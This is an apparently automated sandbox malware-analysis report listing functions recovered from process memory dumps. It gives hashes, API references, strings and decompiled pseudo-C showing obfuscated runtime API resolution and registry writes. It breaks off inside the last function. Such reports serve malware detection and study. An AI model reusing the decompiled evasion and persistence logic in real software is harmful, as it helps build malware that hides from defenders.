Instruction ID: e4f11f696b5bfc1726d7f4e8b8900ffa5e96f9bfdb065e2ae81ff0972514d0ae
Opcode Fuzzy Hash: e667b524b862e3a94adad135c276f1c21d6632468abe252edd2be96f9d2a2025
Instruction Fuzzy Hash: 97310AF5D00309EFDB20DFA5C88499EB7B8FB08204F18496AE502A7250D774AA58DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6EB3527D, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 6EB352D4
ext-ms-, xrefs: 6EB352E8

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: df94aebbfac4af6e79a750607de8b85c78080ef32dfe24524534b5d6ab7ddb16
Instruction ID: 6f852e81b02feeaa0adfffe8fc9d049fb50aabbb67d4e7a52a3d9317d231d3bb
Opcode Fuzzy Hash: df94aebbfac4af6e79a750607de8b85c78080ef32dfe24524534b5d6ab7ddb16
Instruction Fuzzy Hash: 0921F632A56675ABCB2146E9CE42A5EBF68DF02770F310110E817AB280E670ED00CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 07F77B8D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E07F77B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x7f7d2a8; // 0xaaa5a8
				_t1 = _t9 + 0x7f7e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E07F7A055(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E07F71525(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E07F71188(_t34, _t41, _a8);
						E07F78B22(_t41);
						_t42 = E07F7976F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E07F78B22(_t36);
							_t36 = _t42;
						}
						_t43 = E07F7A41C(_t36, _t33);
						if(_t43 != 0) {
							E07F78B22(_t36);
							_t36 = _t43;
						}
					}
					E07F78B22(_t28);
				}
				return _t36;
			}

0x07f77b8d
0x07f77b90
0x07f77b91
0x07f77b99
0x07f77ba0
0x07f77ba7
0x07f77bab
0x07f77bb1
0x07f77bb8
0x07f77bbd
0x07f77bcf
0x07f77bd3
0x07f77bd7
0x07f77bdd
0x07f77be2
0x07f77bf2
0x07f77bf4
0x07f77c0b
0x07f77c0f
0x07f77c12
0x07f77c17
0x07f77c17
0x07f77c20
0x07f77c24
0x07f77c27
0x07f77c2c
0x07f77c2c
0x07f77c24
0x07f77c2f
0x07f77c2f
0x07f77c3a

APIs

Part of subcall function 07F7A055: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,07F77BA7,253D7325,00000000,00000000,74ECC740,?,?,07F79DA0,?), ref: 07F7A0BC
Part of subcall function 07F7A055: sprintf.NTDLL ref: 07F7A0DD

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,07F79DA0,?,08A295B0), ref: 07F77BB8
lstrlen.KERNEL32(?,?,?,07F79DA0,?,08A295B0), ref: 07F77BC0

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

strcpy.NTDLL ref: 07F77BD7
lstrcat.KERNEL32(00000000,?), ref: 07F77BE2

Part of subcall function 07F71188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,07F77BF1,00000000,?,?,?,07F79DA0,?,08A295B0), ref: 07F7119F

Part of subcall function 07F78B22: RtlFreeHeap.NTDLL(00000000,00000000,07F7131A,00000000,?,?,00000000), ref: 07F78B2E

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,07F79DA0,?,08A295B0), ref: 07F77BFF

Part of subcall function 07F7976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,07F77C0B,00000000,?,?,07F79DA0,?,08A295B0), ref: 07F79779
Part of subcall function 07F7976F: _snprintf.NTDLL ref: 07F797D7

Strings

=, xrefs: 07F77BF9

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 8bc8914bd46278efe1ddc5e1197862f84f703d0a82e17e1546cf75cb614cfa6e
Instruction ID: bc3c7346f71ad18f9a6833200f5d2b1d591da72402023f0edbaadb374d6314a5
Opcode Fuzzy Hash: 8bc8914bd46278efe1ddc5e1197862f84f703d0a82e17e1546cf75cb614cfa6e
Instruction Fuzzy Hash: 2411A3F3901129B787227BB89C88CAE76ADDF885A430D4117F504EB200CE24DD02C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2CD90, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 6EA2CDE9
OutputDebugStringW.KERNEL32(00000000), ref: 6EA2CE0C

Strings

UTF-8, xrefs: 6EA2CDF7
%s: %s, xrefs: 6EA2CDE2
UTF-16LE, xrefs: 6EA2CDFC
%s: %s, xrefs: 6EA2CE39

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: DebugOutputString__fprintf_l
String ID: %s: %s$%s: %s$UTF-16LE$UTF-8
API String ID: 1463254302-2651868245
Opcode ID: f9c1ada3d4ed5201b05667a3a1b0934c1caaf85eabc850a5f7b23383472e947a
Instruction ID: 9b6a0d362e3b1b5cf964a2682e17a2b8225375e622024a3e156368c700caca02
Opcode Fuzzy Hash: f9c1ada3d4ed5201b05667a3a1b0934c1caaf85eabc850a5f7b23383472e947a
Instruction Fuzzy Hash: E311C1B68001086FEE106EE4AD85EBF362DEF45319F5C0830F9046A202F732D9718AA7

Uniqueness

Uniqueness Score: -1.00%

Function 6EB457CB, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6EB45517: _free.LIBCMT ref: 6EB4553C

_free.LIBCMT ref: 6EB45819

Part of subcall function 6EB35039: RtlFreeHeap.NTDLL(00000000,00000000,?,6EB25750,?,00000000,?,6EB1747E,00000000,00000011,00000001), ref: 6EB3504F
Part of subcall function 6EB35039: GetLastError.KERNEL32(00000000,?,6EB25750,?,00000000,?,6EB1747E,00000000,00000011,00000001), ref: 6EB35061

_free.LIBCMT ref: 6EB45824
_free.LIBCMT ref: 6EB4582F
_free.LIBCMT ref: 6EB45883
_free.LIBCMT ref: 6EB4588E
_free.LIBCMT ref: 6EB45899
_free.LIBCMT ref: 6EB458A4

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 89ae939b1bb3ff9475477e0a0787fdbcd7d08105918f8467028438959ac2942a
Instruction ID: 6b742cacd7bbaab6d3eecffdd84e14736d84238200874dab9bbb8601b26ff0cc
Opcode Fuzzy Hash: 89ae939b1bb3ff9475477e0a0787fdbcd7d08105918f8467028438959ac2942a
Instruction Fuzzy Hash: 13114F71972F94FAD630AFF4CC06FEF7FAD9F00704F400C19A29966050DB65B9045A98

Uniqueness

Uniqueness Score: -1.00%

Function 07F7944A, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 07F794A4
SysAllocString.OLEAUT32(0070006F), ref: 07F794B8
SysAllocString.OLEAUT32(00000000), ref: 07F794CA
SysFreeString.OLEAUT32(00000000), ref: 07F79532
SysFreeString.OLEAUT32(00000000), ref: 07F79541
SysFreeString.OLEAUT32(00000000), ref: 07F7954C

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 10f325a9fc9fbf2d1ded2cfcb025f3e7b523f2c33eb3f67799ccfe797ae6fbce
Instruction ID: 87dd535c40f294883acb817683e8fbdbbe6af4b3cbd39b23557e372c7d23c85f
Opcode Fuzzy Hash: 10f325a9fc9fbf2d1ded2cfcb025f3e7b523f2c33eb3f67799ccfe797ae6fbce
Instruction Fuzzy Hash: E3417175D00609AFDB01DFB8D845AAEB7BAEF48301F14446AE910EB210DA71E905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07F74944, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E07F74944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E07F71525(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x7f7d2a8; // 0xaaa5a8
					_t1 = _t23 + 0x7f7e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x7f7d2a8; // 0xaaa5a8
					_t2 = _t26 + 0x7f7e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E07F78B22(_t54);
					} else {
						_t30 =  *0x7f7d2a8; // 0xaaa5a8
						_t5 = _t30 + 0x7f7e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x7f7d2a8; // 0xaaa5a8
							_t7 = _t33 + 0x7f7e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x7f7d2a8; // 0xaaa5a8
								_t9 = _t36 + 0x7f7e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x7f7d2a8; // 0xaaa5a8
									_t11 = _t39 + 0x7f7e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E07F75CD1(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x07f74953
0x07f74957
0x07f74a19
0x07f7495d
0x07f7495d
0x07f74962
0x07f74975
0x07f74977
0x07f7497c
0x07f74984
0x07f7498b
0x07f7498d
0x07f74992
0x07f74a11
0x07f74a12
0x07f74994
0x07f74994
0x07f74999
0x07f749a1
0x07f749a3
0x07f749a8
0x00000000
0x07f749aa
0x07f749aa
0x07f749af
0x07f749b7
0x07f749b9
0x07f749be
0x00000000
0x07f749c0
0x07f749c0
0x07f749c5
0x07f749cd
0x07f749cf
0x07f749d4
0x00000000
0x07f749d6
0x07f749d6
0x07f749db
0x07f749e3
0x07f749e5
0x07f749ea
0x00000000
0x07f749ec
0x07f749f2
0x07f749f7
0x07f749fe
0x07f74a03
0x07f74a08
0x00000000
0x07f74a0a
0x07f74a0d
0x07f74a0d
0x07f74a08
0x07f749ea
0x07f749d4
0x07f749be
0x07f749a8
0x07f74992
0x07f74a27

APIs

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,07F734A1,?,00000001,?,?,00000000,00000000), ref: 07F74969
GetProcAddress.KERNEL32(00000000,7243775A), ref: 07F7498B
GetProcAddress.KERNEL32(00000000,614D775A), ref: 07F749A1
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 07F749B7
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 07F749CD
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 07F749E3

Part of subcall function 07F75CD1: memset.NTDLL ref: 07F75D50

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 84d4f642018c31070cd45db3d5bdfa3bd8b64ed1afb4d1edc460c4e87dd57eab
Instruction ID: b4dd3cde7a057f2ab2020c91a273b89638b1c368074ec180d4bb4a5c9d446f06
Opcode Fuzzy Hash: 84d4f642018c31070cd45db3d5bdfa3bd8b64ed1afb4d1edc460c4e87dd57eab
Instruction Fuzzy Hash: 1421F7F160060AEFE710EF69EC85D6AB7FCEF48304709456AE905D7221EA74E906CB64

Uniqueness

Uniqueness Score: -1.00%

Function 07F74B2A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E07F74B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x7f7d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E07F77B3B( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E07F78C52(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E07F78B22(_a8);
						goto L29;
					}
					_t64 =  *0x7f7d278; // 0x8a29d88
					_t16 = _t64 + 0xc; // 0x8a29eaa
					_t65 = E07F77B3B(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d07f7c0
						if(E07F7A38F(_t97,  *_t33, _t91, _a8,  *0x7f7d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x7f7d2a8; // 0xaaa5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x7f7ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x7f7e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E07F78F85(_t69,  *0x7f7d334,  *0x7f7d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x7f7d2a8; // 0xaaa5a8
									_t44 = _t71 + 0x7f7e846; // 0x74666f53
									_t73 = E07F77B3B(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d07f7c0
										E07F74538( *_t47, _t91, _a8,  *0x7f7d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d07f7c0
										E07F74538( *_t49, _t91, _t99,  *0x7f7d330, _a16);
										E07F78B22(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d07f7c0
									E07F74538( *_t40, _t91, _a8,  *0x7f7d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d07f7c0
									E07F74538( *_t43, _t91, _a8,  *0x7f7d330, _a16);
								}
								if( *_t101 != 0) {
									E07F78B22(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d07f7c0
					_t81 = E07F77DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d07f7c0
							E07F7A38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E07F78B22(_t100);
						_t98 = _a16;
					}
					E07F78B22(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E07F7A789(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x7f7d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x07f74b2a
0x07f74b33
0x07f74b3a
0x07f74b3f
0x07f74bac
0x07f74bb2
0x07f74bb7
0x07f74bbe
0x07f74bc3
0x07f74bc8
0x07f74d33
0x07f74d3a
0x07f74d3a
0x07f74d3f
0x07f74d41
0x07f74d41
0x07f74d4a
0x07f74d4a
0x07f74bce
0x07f74bda
0x07f74d29
0x07f74d2c
0x00000000
0x07f74d2c
0x07f74be0
0x07f74be5
0x07f74be8
0x07f74bed
0x07f74bf2
0x07f74c3b
0x07f74c3b
0x07f74c4e
0x07f74c58
0x07f74c5e
0x07f74c65
0x07f74c6f
0x07f74c6f
0x07f74c67
0x07f74c67
0x07f74c67
0x07f74c67
0x07f74c91
0x07f74c99
0x07f74cc7
0x07f74ccc
0x07f74cd3
0x07f74cd8
0x07f74cdc
0x07f74d0e
0x07f74cde
0x07f74ceb
0x07f74cee
0x07f74cfe
0x07f74d01
0x07f74d07
0x07f74d07
0x07f74c9b
0x07f74ca8
0x07f74cab
0x07f74cbd
0x07f74cc0
0x07f74cc0
0x07f74d18
0x07f74d24
0x07f74d1a
0x07f74d1d
0x07f74d1d
0x07f74d18
0x07f74c91
0x00000000
0x07f74c58
0x07f74c01
0x07f74c04
0x07f74c0b
0x07f74c11
0x07f74c14
0x07f74c16
0x07f74c22
0x07f74c25
0x07f74c25
0x07f74c2b
0x07f74c30
0x07f74c30
0x07f74c36
0x00000000
0x07f74c36
0x07f74b44
0x00000000
0x07f74b6b
0x07f74b6b
0x07f74b77
0x07f74b8a
0x07f74b90
0x07f74b98
0x00000000
0x07f74b98

APIs

StrChrA.SHLWAPI(07F79900,0000005F,00000000,00000000,00000104), ref: 07F74B5D
lstrcpy.KERNEL32(?,?), ref: 07F74B8A

Part of subcall function 07F77B3B: lstrlen.KERNEL32(?,00000000,08A29D88,00000000,07F75142,08A29FAB,?,?,?,?,?,69B25F44,00000005,07F7D00C), ref: 07F77B42
Part of subcall function 07F77B3B: mbstowcs.NTDLL ref: 07F77B6B
Part of subcall function 07F77B3B: memset.NTDLL ref: 07F77B7D

Part of subcall function 07F74538: lstrlenW.KERNEL32(?,?,?,07F74CF3,3D07F7C0,80000002,07F79900,07F75C8D,74666F53,4D4C4B48,07F75C8D,?,3D07F7C0,80000002,07F79900,?), ref: 07F7455D

Part of subcall function 07F78B22: RtlFreeHeap.NTDLL(00000000,00000000,07F7131A,00000000,?,?,00000000), ref: 07F78B2E

lstrcpy.KERNEL32(?,00000000), ref: 07F74BAC

Strings

\, xrefs: 07F74B90
(, xrefs: 07F74C0D

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 414fa19c1c42f62f13339e08dee82435ace572a48b083a6751568cfc35cd4f09
Instruction ID: a196b41c26adae27eed1290b2d8b1d7f7c285fd19387410b7a6f5211e5c427fc
Opcode Fuzzy Hash: 414fa19c1c42f62f13339e08dee82435ace572a48b083a6751568cfc35cd4f09
Instruction Fuzzy Hash: 72518EB260020EEFDF51AF64DC80EAA77B9FF08304F08855AF95596220D735D925EB21

Uniqueness

Uniqueness Score: -1.00%

Function 6EB33ADA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6EB33A8C,6EB214E6,?,6EB33A54,6EB30A30,?,6EB214E6), ref: 6EB33AEF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EB33B02
FreeLibrary.KERNEL32(00000000,?,?,6EB33A8C,6EB214E6,?,6EB33A54,6EB30A30,?,6EB214E6), ref: 6EB33B25

Strings

mscoree.dll, xrefs: 6EB33AE8
CorExitProcess, xrefs: 6EB33AFA

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 87cbbf2cc02f8d576586609fcc8f4c7ea8d2682c964bf2697d8a244ad312cd7c
Instruction ID: f3c1ead1fe28e5a20fae5599363515e0808d0b8ace3aeb1ae250db691f78713d
Opcode Fuzzy Hash: 87cbbf2cc02f8d576586609fcc8f4c7ea8d2682c964bf2697d8a244ad312cd7c
Instruction Fuzzy Hash: 80F08C31A21669FFDF099B90DB2AF9E7F78EB01362F200060F514E6150DB308E00DA90

Uniqueness

Uniqueness Score: -1.00%

Function 07F72D74, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E07F72D74(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E07F71525(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E07F78B22(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E07F71525((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x7f7d278 = _t103;
								goto L35;
							}
							do {
